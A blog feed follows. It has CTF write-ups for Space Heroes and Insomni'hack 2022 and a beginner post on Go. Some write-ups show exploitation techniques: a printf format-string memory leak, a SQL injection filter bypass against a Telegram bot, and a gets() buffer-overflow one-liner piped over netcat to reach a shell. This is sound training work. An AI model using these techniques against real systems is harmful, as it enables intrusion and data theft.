Another challenge on Discord, this time the flag was hidden somewhere in the Discord server. I've seen lots of people trying random things in the #mee6 channel to get that flag while it said somewhere. So I've used the search function to search for some flags; nothing. I looked at every channel topic and pinned messages; nothing alarming. But when I went back on the #mee6 channel, I clicked on MEE6's profile; and there it was. MEE6 had a custom role named: shctf{4ut0b0ts_r013_0u7}.

Evil MEE6...

🛡️ Guardians of the Galaxy

We are given a netcat connection and the binary of the program (Download here). When testing the program locally it crashes, but why? Let's investigate by opening the file in a disassembler.

The crash source

This is the source of the crash, and it's really easy to understand. If fopen returns 0x0, then the file doesn't exist, and therefore the binary crashes. So let's create a dummy flag.txt file with the content FLAG_____FLAG. But before running the binary again, we can see that the data for the file is stored at the location rbp-0x30 with a size of 0x20.

Calling convention matters

To confirm that, we can run the file with gdb and check the content:

Confirmed

The binary prints exactly what we send with printf according to this assembly code:

Our text is repeated

So let's use some string formats such as %x or others. When using %p we get a nice hexadecimal representation of the address returned. So let's print lots of them.

Spam, spam, spam...

When looking at the data being given back, we can see some hexadecimal values of ASCII characters. Starting at 0x6d697b6674636873 and ending at 0x55f6d2000a7d. So let's write a Python script to extract that data:

"""
Useless data:

0x7ffd7417b6f0
0x55f6d353b2a0
0x2570257025702570
0x2570257025702570
0x2570257025702570
0x70257025702570
---------------

Important data:

0x6d697b6674636873
0x636172747369645f
0x756f795f676e6974
0x55f6d2000a7d
"""

from binascii import unhexlify

flag = b"".join(
    [
        unhexlify("6d697b6674636873")[::-1],
        unhexlify("636172747369645f")[::-1],
        unhexlify("756f795f676e6974")[::-1],
        unhexlify("55f6d2000a7d")[::-1],
    ]
)

print(flag)

Code

This gave back: b'shctf{im_distracting_you}\n\x00\xd2\xf6U', and there we have the flag, shctf{im_distracting_you}.

🧑‍🚀 Space traveler

We were given a URL: https://spaceheroes-web-explore.chals.io. When going on the website we could hit the Guess The Flag button. We had to give a flag as input and it would say if it's valid or not. Looking at the network tab in the developers tool, not external requests were made. So the check is done locally. When looking at the source code there was some obfuscated source:

var _0xb645 = ["\x47\x75\x65\x73\x73\x20\x54\x68\x65\x20\x46\x6C\x61\x67", "\x73\x68\x63\x74\x66\x7B\x66\x6C\x61\x67\x7D", "\x59\x6F\x75\x20\x67\x75\x65\x73\x73\x65\x64\x20\x72\x69\x67\x68\x74\x2E", "\x73\x68\x63\x74\x66\x7B\x65\x69\x67\x68\x74\x79\x5F\x73\x65\x76\x65\x6E\x5F\x74\x68\x6F\x75\x73\x61\x6E\x64\x5F\x6D\x69\x6C\x6C\x69\x6F\x6E\x5F\x73\x75\x6E\x73\x7D", "\x59\x6F\x75\x20\x67\x75\x65\x73\x73\x65\x64\x20\x77\x72\x6F\x6E\x67\x2E", "\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C", "\x64\x65\x6D\x6F", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64"];

function myFunction() {
    let _0xb729x2;
    let _0xb729x3 = prompt(_0xb645[0], _0xb645[1]);
    switch (_0xb729x3) {
        case _0xb645[3]:
            _0xb729x2 = _0xb645[2];
            break;
        default:
            _0xb729x2 = _0xb645[4]
    };
    document[_0xb645[7]](_0xb645[6])[_0xb645[5]] = _0xb729x2
}

When looking at it, we can see it's obfuscated, so let's deobfuscate it!

function myFunction() {
  let azante;
  let karynna = prompt("Guess The Flag", "shctf{flag}");
  switch (karynna) {
    case "shctf{eighty_seven_thousand_million_suns}":
      azante = "You guessed right.";
      break;
    default:
      azante = "You guessed wrong.";
  }
  ;
  document.getElementById("demo").innerHTML = azante;
}

Well, that's much more readable and we can see the flag in plaintext: shctf{eighty_seven_thousand_million_suns}.

🕵️‍♂️ Curious?

This challenge was pretty straight forward, it was an OSINT challenge. For this one is was basically "Who can search better on Google?". Well in my case, I used TinEye since we were given a picture:

Isn't Curiosity amazing?

When searching for that picture, there were some websites that had this picture. Here is a list of them:
~~http://www.dailytechinfo.org/tags/%C7%E0%E4%E5%F0%E6%EA%E0/~~ - Russian, nothing important for the challenge
~~https://dailytechinfo.org/space/5613-marsohod-curiosity-napolovinu-preodolel-voznikshee-pered-nim-prepyatstvie.html~~ - Russian, nothing important for the challenge
~~http://news.discovery.com/space/the-moment-when-curiosity-breached-a-mars-dune-140205.htm~~ - Offline
https://www.hjkc.de/_blog/2014/02/05/2391-mars-curiosity-chroniken---curiosity-news-sol-529-533/ - Could be interesting
https://www.space.com/24592-mars-rover-curiosity-dune-jump.html - Could be interesting

When looking at the last result, it clearly has as title "The Moment When Curiosity Breached a Mars Dune". Considering the flag format was given, shctf{SOL_xxx}, we can see that this picture was taken at SOL 533. So pretty simple, right? shctf{SOL_533} is the flag.
The other website, hjkc.de also contained the SOL 533 picture, you just have to scroll a lot.

🚀 Launched

Another OSINT challenge, this time we are given the picture of a rocket that just launched.

Just awesome to see that..

Considering the flag format was shctf{rocket_payload}, it's pretty easy to know we need to find the rocket and its payload name. It's also the first time I know payloads can have names 🤯
So let's get exiftool in my hands. When looking at the data we got back, we can see some interesting information:

ExifTool Version Number         : 12.40
File Name                       : launched.jpg
...
Date/Time Original              : 2019:04:11 18:36:33
Create Date                     : 2019:04:11 18:36:33
...

One of them being the exact date and time when the picture was taken. So we can see that the rocket was launched at 2019:04:11 18:36:33. Just need to find the rocket name and its payload now.
A simple Google search showed that the rocket was a Falcon Heavy. Now we need the payload name; let's try Wikipedia. Yup, there we go:

Interesting that payloads have names...

So now let's put everything in the flag format, shctf{rocket_payload}, and we get shctf{falcon_heavy_arabsat-6A}.

🌌 Flag in space

A web challenge. We are greeted with a website that has a grid with empty content. We URL was http://172.105.154.14/?flag=, so let's try to put some garbage in the GET parameter. When trying some characters you can see that some grids now contain the character that was correct, so if you put the flag parameter to shctf{aaa, you get the following:

The flag is not encoded, phew

Looking at the source code it's a basic <div>s</div> for every character. We could try each character ourselves but some flags are known to have special characters or numbers so it would take ages. Therefore I made a simple script that appends every character, and if it gets the <div> element, then it gets added in a variable res. I've already put the known characters as an element in the res variable.
Then we simply make a request with all the characters from res and append the currently looped character. Here is my source code, you might understand it better:

import requests

flag = ["", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "}"]
res = ["s", "h", "c", "t", "f", "{"]

for i in range(0, len(flag)):
    for j in range (0x21, 0x7d):
        char = chr(j)
        url = "http://172.105.154.14/?flag=" + "".join(res) + char
        r = requests.get(url)
        response = "".join(r.text.split())
        previous = ""
        for k in range(0, len(res)):
            previous += "<div>" + res[k] + "</div>"
        if f"{previous}<div>{char}</div>" in response:
            res += char
            print("".join(res), end="\r")
            break
print("".join(res))

Code

After quite some time, the script gives the following flag back: shctf{2_explor3_fronti3r}.

🤖 R2D2

Looking back at this one, it was pretty obvious... We are greeted on a website that looks like that:

I personally don't like Star Wars :D

Looking at the source code, nothing. Looking at the local storage, nothing. Looking at the cookies, nothing. I decided to run gobuster on the website with a wordlist. Guess what kind of file was detected... robots.txt, of course......

This shows my lack of experience

Getting on that file gives the flag back, shctf{th1s-aster0id-1$-n0t-3ntir3ly-stable}.

🌟 Starman

Another OSINT challenge. This time the description says already a lot:

How far away from earth was the space car on January, 20 2021 at 1515 UTC? Enter distance in terms of Million Km. (Rounded to two decimals) (e.g shctf{12.34})

Searching up on Google what the space car is, I came across this website. And at the right we can give a date and time, and we get an awesome map. When looking at the map we see that it was at 56.68 million km away from earth. Therefore the flag was: shctf{56.68}.

🐕 Space Buds

One of the puppies got into the web server. Can you help find out who it was?

With that description there also was a picture of the Space Buds.

Cute dogs :)

There also was a website, that pretty much contained nothing. But when inspecting the source code, there was a hidden input element.

The background is horrible

So I searched up on the Internet what the names of the puppies were and put them one by one in the input field. But still nothing. However, when sending the form, there was a request made to /getcookie. So maybe there's something in my cookies?

Nothing big. Right?

But we can change the value of that cookie, so let's put the name of each dog in the cookie and reload the page. When typing Mudbud, there was a flag given.

Please next time put some better quality

After literally decrypting that flag, it results to shctf{tastes_like_raspberries}.

🛰️ Cape Kennedy

This was a reversing challenge. We were given a Python file that contains a password check.

import sys

def main():
  if len(sys.argv) != 2:
    print("Invalid args")
    return

  password = sys.argv[1]
  builder = 0

  for c in password:
    builder += ord(c)

  if builder == 713 and len(password) == 8 and (ord(password[2]) == ord(password[5])):
    if (ord(password[3]) == ord(password[4])) and ((ord(password[6])) == ord(password[7])):
        print("correct")
    else:
        print("incorrect")
  else:
    print("incorrect")

if __name__ == "__main__":
  main()

Source

This one was quite easy to reverse. The password must have a length of 8. The characters and index 2 and 5 must be the same, the characters at index 3 and 4 must be the same and the characters and index 6 and 7 must be the same. The sum of the hexadecimal value of the characters must be 713.
Let's make a bruteforce script:

import random
from string import ascii_letters

pwds = []

def solve():
    while True:
        s = ["A"]*8
        s[0] = random.choice(ascii_letters)
        s[1] = random.choice(ascii_letters)
        s[2] = random.choice(ascii_letters)
        s[5] = s[2]
        s[3] = random.choice(ascii_letters)
        s[4] = s[3]
        s[6] = random.choice(ascii_letters)
        s[7] = s[6]
        builder = 0

        password = "".join(s)

        for c in password:
            builder += ord(c)

        if (builder == 713 and len(password) == 8 and (ord(password[2]) == ord(password[5]))):
            if (ord(password[3]) == ord(password[4])) and ((ord(password[6])) == ord(password[7])):
                if password not in pwds:
                    pwds.append(password)
                    with open("moon.txt", "a") as f:
                        f.write(password + "\n")
solve()

Source

And yes, there was A LOT of valid passwords, over 3 millions.
Considering it was space themed (It was mentioned in the description of the challenge again.), I searched what happened at Cape Kennedy and that was related to the moon, since the file was named moon.py. It didn't took long until I've found that Apollo 11 started from there, a historic moment in space exploration! Looking at the results in moon.txt I've found a string generated that was APOllOaa. So with the knowledge of before and that valid string, the flag is simply shctf{Apollo11}.

⭐ Star Pcap

There was no description, just a pcap file (Download here). When opening the file with Wireshark, we can see that there is just one slight change in all those ICMP packets, which is the ICMP code.
Using pyshark it was easy to put all these codes together, convert them to an decimal value and then to a character.

import pyshark

capture = pyshark.FileCapture("star.pcap")
data = ""
for packet in capture:
    data += chr(int(packet.layers[2]._all_fields["icmp.code"]))

print(data)

Source

This resulted in the following string: c2hjdGZ7TDBnMWMtaSQtdGgzLWJlZ2lOTmluZy0wZi13aSRkb019. Typical for CTFs, the data is base64 encoded. After decoding it, we can get the flag: shctf{L0g1c-i$-th3-begiNNing-0f-wi$doM}.

👁️‍🗨️ Mysterious Broadcast

Another web challenge.

There used to be 8 Models of humanoid cylon but now there are only 7. We've located one of their broadcast nodes but we can't decode it. Are you able to decipher their technologies?

When going on the website, there is a random ID generated in the URL, it looks like this: http://173.230.134.127/seq/710a1f63-57b9-4b86-a880-f413418375d9
The website had nothing besides an ~ as response, interesting. When reloading; it turned to a 1, when reloading again; it didn't changed. But when reloading for the third time, it turned to a 0. Here is how it looked like:

You probably don't want to write one by one

Binary! But I don't want to write everything down as it might be a lot of 0's and 1's in the end, so let's make a quick Python script and save the output in a variable:

import requests

binary = ""

while True:
    r = requests.get("http://173.230.134.127/seq/710a1f63-57b9-4b86-a880-f413418375d9")
    if (r.text == "~"):
        break
    binary += r.text
    print(binary)

print("\n[+] Received: " + binary)
# 1100011011001011010001101010110010010001111011010011011110100011011000100111011010101100001101011111011001001010110001101100001000101011001110100011101101110110001100001010101011001110100101101000110001011011011010010110100011000111101101101001001110011000011110011101111010111101

Source

Here we go, we got the binary and now we can just decode it.

ÆËF¬‘í7£bv¬5öJÆÂ+:;v0ªÎ–Œ[ihÇ¶“˜yÞ½ ehhh, I don't think that's correct 🤔 Let's look at the description again - There used to be *8* Models of humanoid cylon but now there are only *7*. [...]. Remember, when representing a character, for example A, in binary there are 8 1's or 0's such as 01000001. And according the the description, there are now only 7. So let's put a space every 7th character and decode that.
Most of the decoders give the same output, as they don't take in consideration the space. But this one did take in consideration the space. It resulted in c2hjdGZ7QXNjaWlJc0E3Qml0U3RhbmRhcmR9Cg==. Again, the == is typical for base64 encoding. So let's decode it: shctf{AsciiIsA7BitStandard}.

🐈 Space Captain Garfield

This one was more about OSINT at the beginning. We have the following picture:

What on Earth is that...

There was just the number 2254 not encrypted. So by searching garfield dreaming 2254 on Google I've found this picture:

The fun is coming...

So yes, what had to be done was to map each character to its sign and then reconstruct the flag in the last picture. I started and got shctf{lasa..alo.er}, after some guessing for the last ones it was shctf{lasagnalover}.

🚩 Netflix and CTF

This one was very similar to the Star Pcap challenge above. We are given a pcap file (Download here) and we have to analyze it. When looking at it, there is always request made to http://10.10.100.124:8060/keypress/Lit_X where X always varies. Sometimes there is a request made to /browse, this puts a line between the keypresses, and show names.
So let's make a Python script using tshark again and save the output of each show in a list:

import pyshark
import urllib.parse

capture = pyshark.FileCapture("netflix-and-ctf.pcap")
data = []

show_data = ""
for packet in capture:
    try:
        if "browse" in packet.layers[3]._all_fields["http.response_for.uri"]:
            data.append(show_data)
            show_data = ""
            continue
        show_data += urllib.parse.unquote(packet.layers[3]._all_fields["http.response_for.uri"].replace("http://10.10.100.124:8060/keypress/Lit_", ""))
    except:
        pass

for show in data:
    if "shctf" in show:
        print(f"Special show found: {show}")
        break

Source

The special show found was: shctf{T1m3-is-th3-ultimat3-curr3Ncy}.

🚦 Strange Traffic

My favorite forensics challenge. We were given again a pcap file (Download here). There also was a free hint, so let's take it:

Hint: alt,esc,1,2,3,4,5,6,7,8,9,0,-,=,backspace,tab,q,w,...

All right, now let's investigate the pcap file.

Only UDP packets, this one will be easy.

The number encircled in purple is the only number that changes and appears in all packets. So we need to get this value for each packet. For this example, the 35 is formed thanks to the 33 and 35 which if decoded to in the ASCII table, they are 3 and 5. Now with 35 what can we do? Let's look at the hint again. It's clearly a keyboard layout. Now if we look at the query keyboard layout that was sent on Discord:

I've never used such a keyboard

If we start counting each key and count up to 35, we get the key s, which could fit for the s in the shctf{...} format. After checking with the other packets, this theory is right. Now let's code a script for that:

import pyshark, binascii

capture = pyshark.FileCapture("strangetraffic.pcap")

# Map the entire keyboard
map = {
    "1": "`",
    "2": "1",
    "3": "2",
    "4": "3",
    "5": "4",
    "6": "5",
    "7": "6",
    "8": "7",
    "9": "8",
    "10": "9",
    "11": "0",
    "12": "-",
    "13": "=",
    "14": "<-",
    "15": "tab",
    "16": "q",
    "17": "w",
    "18": "e",
    "19": "r",
    "20": "t",
    "21": "y",
    "22": "u",
    "23": "i",
    "24": "o",
    "25": "p",
    "26": "[",
    "27": "]",
    "28": "enter",
    "29": "caps",
    "30": "a",
    "31": "s",
    "32": "d",
    "33": "f",
    "34": "g",
    "35": "h",
    "36": "j",
    "37": "k",
    "38": "l",
    "39": ";",
    "40": "'",
    "41": "#",
    "42": "shift",
    "43": "\\",
    "44": "z",
    "45": "x",
    "46": "c",
    "47": "v",
    "48": "b",
    "49": "n",
    "50": "m",
    "51": ",",
    "52": ".",
    "53": "/",
    "54": "ctrl",
    "55": "win",
    "56": "alt",
    "57": "space",
    "58": "alt",
    "59": "win",
    "60": "menu",
    "61": "ctrl",
}

flag = []

for packet in capture:
    payload = packet.layers[2]._all_fields["udp.payload"][75:].split(":") # Ignore the fist 75 characters from the payload
    for i in range(0, len(payload)):
        payload[i] = str(binascii.unhexlify(payload[i]), "ascii") # Coinvert to ASCII representation
    flag.append("".join(payload))

res = ""

for f in flag:
    res += map[str(f)]
print(res.replace("shift[", "{").replace("shift]", "}").replace("enter", "").replace("space", "_")) # Description said we can swap spaces with underscores

Source

In the end we get the following flag: shctf{thanks_f0r_th3_t4nk._he_n3ver_get5_me_anyth1ng}.

🔮 Future Stego

For this challenge there were two pictures, one to download which was:

The quality is insane

There also was another picture in the description, as a hint:

I wasn't born when this was published x)

After trying lots of steganography techniques, I couldn't find any that lead me to the flag. One of the last was to use stegcracker. I tried to bruteforce the password with the rockyou wordlist, but stopped at around 300'000 words tried. Nothing.
But the picture wasn't here for nothing.. Let's try some passwords that are in the news paper picture and use steghide --extract -sf shuttle.jpg. After playing around and trying some combinations such as spacewoman, newsweek or sally k. ride, I tried the file name: sallyride. This was the password and extracted a text file which contained the flag: shctf{weightlessness_is_a_great_equalizer}. It also would've worked with stegcracker and the right password in a text file.

🚩 Insomni'hack 2022 CTF write-up

Krypton — Mon, 28 Mar 2022 18:59:00 +0000

Original post

The Insomni'hack 2022 CTF is a CTF hosted during the Insomni'hack conference in Geneva, Switzerland. You had to register yourself so that you can attend to the on-site CTF. There was a total of 31 challenges. As a beginner in CTFs I decided to mostly take the easy challenges. The CTF was from March 25 (6:15pm local time) to March 26 (4am local time) 2022.
As my first on-site CTF it was nice to see how many people were participating. It was also pretty amazing to see how some people were prepared; some people even decided to transport their own big monitor(s) 🤯 It was an overall amazing CTF, so many thanks to the organizers!
All flags had the same format which was INS{...}. Anways, enough talking, here are the write-ups:

🐛 GDBug

We were given a binary file (Download the file) that we had to execute to get the right flag. Let's start by running it with basic ./gdbug:

When executing the file, a serial number to check needs to be given as an argument. After providing one as argument it would check the serial and return if it was a valid one or not. So let's open up the binary in a disassembler and see how it works.

Looking at the top there was --debug, after running the binary with that serial it wasn't a success; INS{Th1$Fl4gSuck$}. There also was a call to ptrace(), typical anti-debugging trick. If the binary was to be run from any debugger it would give this flag INS{W0ULDNT-1T-B3-T00-34SY}. Simply NOPing the entire ptrace check was enough to bypass it, now the binary can be ran in a debugger if needed. So let's look at how the check for the serial works:

At first there is a variable x initialized with the value 0x539, then a new variable i initialized with the value 0x0. After that, a loop starts:

It loops forever until i has reached the length of the serial, so it goes over all characters in the serial
The hexadecimal value of the character is then added to the x value
i is incremented by one

gdb also confirmed that it was the hexadecimal value of each character that was added to x:

At the end of that loop there were more checks as you can see from this:

It will be checked if x is equals 0xb38, so the sum of all hexadecimal values of all characters in the serial must result to 0xb38. After this check, there are 5 more checks that are really easy to understand:

The length of the serial must be 0x18
At index 0x4, 0x9, 0xe and 0x13 of the serial, there should be a character with hexadecimal value 0x2d, which is the hexadecimal value of -.

A valid serial pattern would look like xxxx-xxxx-xxxx-xxxx-xxxx.
Based on these restrictions, we could simply create a bruteforce tool in Python:

from string import ascii_uppercase
import itertools

def iter():
    for s in itertools.product(ascii_uppercase, repeat=24):
        s = list(s)
        s[4] = "-"
        s[9] = "-"
        s[14] = "-"
        s[19] = "-"
        yield "".join(s)

def solve():
    while True:
        for serial in iter():
            x = 0x539 # Setup the variables
            i = 0
            while (True):
                if (i >= len(serial)): # Go over the length of the string
                    break
                x += ord(serial[i]) # Append the hexadecimal value of the current character to 'x'
                i += 1
            print(f"Trying {serial}", end="\r")
            if (hex(0xb38)==hex(x)): # Check if the serial is a valid serial or not
                print(f"Found: INS{{{serial}}}")
                return # Remove this to see all possible flags

solve()

Code

The output was quite interesting...

Found: INS{AAAA-AAAA-AAAA-AAAA-AFZZ}
Found: INS{AAAA-AAAA-AAAA-AAAA-AGYZ}
Found: INS{AAAA-AAAA-AAAA-AAAA-AGZY}
Found: INS{AAAA-AAAA-AAAA-AAAA-AHXZ}
Found: INS{AAAA-AAAA-AAAA-AAAA-AHYY}
Found: INS{AAAA-AAAA-AAAA-AAAA-AHZX}
...

The reason was quite simple, all of them were valid flags!

🤖 Bot Telegram

This challenge was my personal favorite. We were given a Telegram bot to chat with, and we had as challenge to exploit it. So at first I tried to execute some of the commands it has. None of them were really surprising when being executed. Then I tried with some random arguments after the command, and boom! When executing the command /challs leet the bot returned

Oops an error occured : (1054, "Unknown column 'leet' in where clause")

The challenge is about an SQL injection. After trying to get the list of tables to perform an UNION attack the bot said that whitespaces were not allowed, only one argument was allowed. Fortunately there is an easy bypass, which is to replace all whitespaces with `//** (comments), it will then be interpreted the same as a whitespace. The first discovery was that some fields are too long to be sent along in some fields, so usingSUBSTR() did the trick. The bot ended up leaking the users` table.

Then we can leak the columns inside that table, there was the column username and password:

So now we can simply leak the credentials for the existing row(s). There was 3 users, one of them had the username admin and the password, the flag, INS{C0ngr@tz_YoU_d3$eRvE_T3iS_Fl@g}.

Also, dear staff members, sorry for bullying the bot :(

🅰️ Wordle

This challenge was based on the popular worlde game where you give a word of 5 characters and then you know if a character is in the word to guess, at the correct place or not in it at all.
We were given a netcat server that was listening on port 1337 and we had to exploit the game. We also had a binary file that did exactly the same, so that we can debug it (Download the file).
My first try was to actually spam the execution of the wordle binary and get the right word at some point since we were given an output that said what the correct word was.
Even when getting the right word, it gave the error message. So I opened the file in a disassembler. The assembly code for the logic was very easy:

The program moves to the address 0xcb1 if the value in data_2020e0 is equals 0xdeadbeef. It will then call the system() function with a randomly taken string from the possible words. One of these words was /bin/sh, so it was clear there was shell access at the end.

So let's put deadbeef as user input? Well, the user input is stored in data_2020c0, so that won't work. However, the user input is parsed with the unsafe gets() method, which means it is possible to overflow that value.
There is a difference of 32 bytes between both addresses. So a simple overflow of 32 bytes can let me put anything inside data_2020e0.
The payload for that overflow would be the following:

(python2 -c 'print "A"*32 + "\xef\xbe\xad\xde"'; cat) | nc wordle.insomnihack.ch 1337

Since there was not only /bin/sh in the list of words, the program had to be executed multiple times.
In the end the flag was INS{C0ngr@tulat1on5!_th3_word_was_d3adBeef!}.

🌊 Weak Rivest 4

Weak Rivest 4 reminded me of the RC4 cipher. The cipher is using a keystream and is, of course, considered as insecure.
We were given 3 strings, 1 plaintext and 2 ciphertexts:

pt1 = I_do_not_like_ponies
ct1 = D058DECB037A10916E9D8B0E5345BB381AE8D8EE
ct2 = D049E9DF182420AB5EC6BD101229940517B59CE0

All the strings had the same length, we simply had to convert the pt1 to its hexadecimal representation 495F646F5F6E6F745F6C696B655F706F6E696573 to also get a length of 40. We had one plaintext, which was encrypted with a key and resulted to one of the cipher text. The flag was most likely the second plaintext (pt2), which is unknown.

To solve the challenge there is the reused key attack on stream ciphers, such as RC4. To explain is shortly, XORing the same character index in ct1 with the one from ct2 will result in the same as XORing the same character index in pt1 and pt2, which will let us slowly build the pt2 string. So for the challenge:

ct1 \oplus ct2 = pt1 \oplus pt2

So to get pt2 we simply need to:

Take every time 2 characters from both ct1 and ct2 and convert them to a hexadecimal character
XOR them together to get a result
Get 2 characters from pt1 and XOR it with result
Append the character corresponding to that value to a flag variable.

I ended up making the following Python script:

import time

pt1 = "495F646F5F6E6F745F6C696B655F706F6E696573"
ct1 = "D058DECB037A10916E9D8B0E5345BB381AE8D8EE"
ct2 = "D049E9DF182420AB5EC6BD101229940517B59CE0"

flag = ""

for i in range(0, len(ct1) - 1, 2):
    ct1_pair = int("0x" + ct1[i : i + 2], 16)  # Get two characters from ct1
    ct2_pair = int("0x" + ct2[i : i + 2], 16)  # Get two characters from ct2
    result = ct1_pair ^ ct2_pair
    pt1_pair = int("0x" + pt1[i : i + 2], 16)  # Get two characters from pt1
    flag += chr(
        pt1_pair ^ result
    )  # XOR the two characters with result and append to the flag, aka pt2
    print(flag, end="\r")
    time.sleep(0.1)  # That is just to look cool 😎

Code

This resulted in the following flag: INS{D0_No7_u$3_Rc4!}

🔮 Magic Words

For this challenge we were given a link to a website. The website asked for a sentence, so basically we had to get this sentence. When looking at the source code there was some checks, so the first thing to do was to create the same file on the local machine.
Then simply take each check one by one and get the words in each paragraph. Then recreate the checks locally and execute the script.

// More code above...

// This is the needed code
p1 = 'Later, on my walk, I wondered why I felt I had to be suspicious of ‘normality’. The striking thing about the normal is that there is nothing normal about it: normality is the gentrification of ordinary madness – ask an Surrealist. In analysis ‘the normal child’ is often synonymous with the obedient good child, the one who only wants to please parents and develops what Winnicott called ‘a false self’';
p2 = 'In the hospital men’s room, as I’m washing my hands, I glance in the mirror. The man I see is not so much me as my father. When did he show up? There is no soap; I rub hand sanitizer into my face–it burns. I nearly drown myself in the sink trying to rinse it off.';
p3 = 'Your only chance of survival, if you are sincerely smitten, lies in hiding this fact from the woman you love, of feigning a casual detachment under all circumstances. What sadness there is in this simple observation! What an accusation against man! However, it had never occurred to me to contest this law, nor to imagine disobeying it: love makes you weak, and the weaker of the two is oppressed, tortured and finally killed by the other, who in his or her turn oppresses, tortures and kills without having evil intentions, without even getting pleasure from it, with complete indifference; that’s what men, normally, call love.';
p4 = 'Looking back on those incidents, he was always appalled by the memory of his passivity, hard though it was to see what else he could have done. He could have refused to pay for such gravy damage to his room, could have refused to change his shoes, could have refused to kneel to supplicate for his B.A.';
p5 = 'The way he went after that plump sister in the lace tucker, was an outrage on the credulity of human nature. Knocking down the fire-irons, tumbling over the chairs, bumping against the piano, smothering himself among the curtains, wherever she went, there went he. He always knew where the plump sister was. He wouldn’t catch anybody else. If you had fallen up against him (as some of them did), on purpose, he would have made a feint of endeavouring to seize you, which would have been an affront to your understanding, and would instantly have sidled off in the direction of the plump sister. She often cried out that it wasn’t fair; and it really was not.';

var response = '';

var words = p1.split(' ');
for (var i = 0; i < words.length; i += 1) {
    if (words[i] == 'please') response += words[i];
}

var words = p2.split(' ');
for (var i = 0; i < words.length; i += 1) {
    if (beautify(words[i]) == 'siqz') response += ' ' + words[i];
}

var words = p3.split(' ');
for (var i = 0; i < words.length; i += 1) {
    if (uglify(words[i]) == 'MDA=') response += ' ' + words[i];
}

var words = p4.split(' ');
for (var i = 0; i < words.length; i += 1) {
    if (digitalize(words[i]) == '746865') response += ' ' + words[i];
}

var words = p5.split(' ');
for (var i = 0; i < words.length; i += 1) {
    if (mystify(words[i]) == 'c83b72dd001482ce10f0b106c7a0ed0e') response += ' ' + words[i];
}

console.log(response);

Code

Then the result was please show of if in of is in an it to me to to of is by in or the way. There was just to find a good word that would fit in the sentence for pleas show [of if in of is in an it to me to to of is by in or] the way, the best is definitely please show me the way.

When submitting that, the flag (INS{jQu3ry_1$_Fr3@kiNg_C0oL}) was given as response.

👋 Welcome challenge

We get a link to a GitLab repository where there are instructions to follow to actually solve the challenge which included commiting changes.
After folowing the steps the first time my shell looked kind of, weird:

You are infected 🧟 $

But I wasn't the only one who got this joke:

After checking where this came from, it was located in inso/.circleci/pre-commit, there also was a exec $SHELL command at the end of the file, to make sure you see that. By simply removing the lines that changed my PS1 variable and removing the exec $SHELL command, I was able to get the flag in return.
The flag was given with a response to a failed commit like the following: remote: INS{S0_F4r_S0_g00d}.

📗 What is Go?

Krypton — Sat, 16 Oct 2021 15:39:00 +0000

Original post

When I first read about Go and what it offers I decided to start and learn it. After some time I realized it has some amazing potential, and I wanted to share it here with you. Note that this is just a short blog post to show and explain what Go is and how it works, it's not supposed to be a Wikipedia article 😉

📜 About Go

Go is a statically typed and compiled programming language. Go is designed at Google by Robert Griesemer, Rob Pike, and Ken Thompson. Syntactically Go is very similar to C, but it has memory safety, garbage collection, structural typing and many other advantages. It's an easy language for developers to learn quickly.

🤔 Why has Go been created?

Go was intended as a language for writing server programs that would be easy to maintain over time. It's now being used for writing light-weight microservices and is being used for generating APIs that will later on interact with the front-end. So in short words I could say that it was mainly created for APIs, web servers, frameworks for web applications, etc.

🎖️ Why is Go "so good"?

Its easy concurrency is really easy to make and include in your projects. As you may know, network applications are really dependent of concurrency, and that's why Go's networking features makes it even easier and better.

When declaring interfaces in Go, you don't need to add like in other language the keyword implements or anything similar. Which means we can create an interface and simply make another object implement it, we simply need to make sure that all the methods from the interface are in the object implementing it, just like any other language.

When looking at Go's standard library we can see that we don't always specifically need to get a third-party library. It goes from parsing flags when executing your program to testing.

Since Go get compiled into machine code, we need a compiler. For Go, the compilation time is quite fast compared to some other languages, one reason for that is that Go does not allow unused imports. If you want a comparison to another language, Go is significantly faster than C++ at compilation time, however it also results in Go's binary to be bigger in terms of size.

And as always, who does not like programming languages that are cross-platform? Well, Go got you covered for that, from Android to Linux to Windows, just run go tool dist list in your terminal to see it.

🤯 How hard is Go?

This is a question you often get asked when you learn a new programming language and other people you know may want to learn it. For Go, it's a simple answer because the language itself is simple. Go's syntax is quite small compared to many other languages and therefore easier to remember. Most of the things can be remembered quite easily and this means you won't need to spend a lot of time at looking things up. You can start taking a look at Go here.

👋 A "Hello world!" in Go

A hello world is often included when you explain what a language is, so here it is:

package main

import "fmt"

func main() {
    fmt.Println("Hello world!")
}

📚 What are packages?

Packages are a way to organize your code and to make it reusable. You can import packages from the standard library or from third party libraries. To import a package you can use the following syntax:

import "fmt"

This will import the package fmt from the standard library. You can also import multiple packages at once:

import (
    "fmt"
    "math"
)

You can also import packages with a different name:

import (
    "fmt"
    m "math"
)

This will import the package math but instead of using math you can use m to call the functions from the package.

Installing packages

To install a package you can use the following command:

go get <link>

The <link> is the link to the package you want to install. For example, if you want to install the https://github.com/kkrypt0nn/spaceflake package you can use the following command:

go get github.com/kkrypt0nn/spaceflake

Usually the way to download the package is written in the README.md file.

🌐 Did I hear web server?

Correct! Go is widely used for web servers and/or APIs. This can go from a very basic REST API to using Websockets. In comparison to other languages, Go does not need some overcomplicated web framework, Go's standard library already has this implemented and ready for us. Of course there are third party libraries that implements some additions.

To create a very basic web server we need to import two default libraries like the following:

import (
    "fmt" // This is to give output when requesting a page (also used in the hello world example)
    "net/http" // This is needed to handle requests, etc.
)

Now we can create a simple handler that will listen to the port 1337 and register a new /hello route.

func helloWorld(response http.ResponseWriter, request *http.Request) {
    fmt.Fprintf(response, "Hello from the Gopher side!")
}

func main() {
    http.HandleFunc("/hello", helloWorld)
    http.ListenAndServe(":1337", nil)
}

Now run the code with go run main.go and go to 127.0.0.1:1337/hello.

In around 3-7 lines of code we managed to start a web server and create a route that will display some text.

Now it's up to you to make your creative projects :)

🥈 What is Go's concurrency?

Goroutines

Python developers may know what coroutines are, however to include them in your project you need an additional library called asyncio. Yes that's not a big deal as most of the Python features relies on libraries anyways.

The difference with Go, is that you can easily create a so called Goroutine to make functions run concurrently. Here's a very easy example on how to create a Goroutine:

package main

import (
    "fmt"
    "time"
)

func echo(s string) {
    for i := 0; i < 5; i++ {
        time.Sleep(100 * time.Millisecond)
        fmt.Println(s)
    }
}

func main() {
    go echo("world")
    echo("Hello")
}

